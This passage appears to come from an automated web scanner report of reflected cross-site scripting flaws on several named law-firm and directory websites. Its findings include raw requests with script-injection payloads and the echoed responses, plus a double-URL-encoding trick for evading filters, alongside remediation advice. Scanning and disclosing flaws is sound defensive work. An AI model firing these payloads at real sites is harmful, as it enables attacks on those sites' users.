GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.121. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX law offices | Find ...[SNIP]... <select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);"> ...[SNIP]...
4.122. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mckennacuneo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1 Host: www.mckennacuneo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 16:52:37 GMT Server: Apache/2.2.15 (FreeBSD) X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15847
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'> <html xmlns='http://www.w3.org/1999/xhtml'> <head> <meta http-equiv='Content-Type' content='text/html; ...[SNIP]... <a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'> ...[SNIP]...
4.123. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/2011insights.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... <script type="text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
4.124. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUB ...[SNIP]... "text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:08 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 82130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]... var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:19 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... xt/javascript"> var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:10:14 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept-Encoding Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/ Keep-Alive: timeout=10, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/ Content-Length: 68250
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual' };
var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin' };
var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google ...[SNIP]...
4.128. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vault.com
Path:
/wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... :true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1' };
var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin' };
var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenge ...[SNIP]...
4.129. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vault.com
Path:
/wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... ID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1' };
var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin' };
var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger' ...[SNIP]...
4.138. http://www.weil.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <!-- window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O ...[SNIP]...
4.139. http://www.weil.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]> ...[SNIP]...
4.140. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
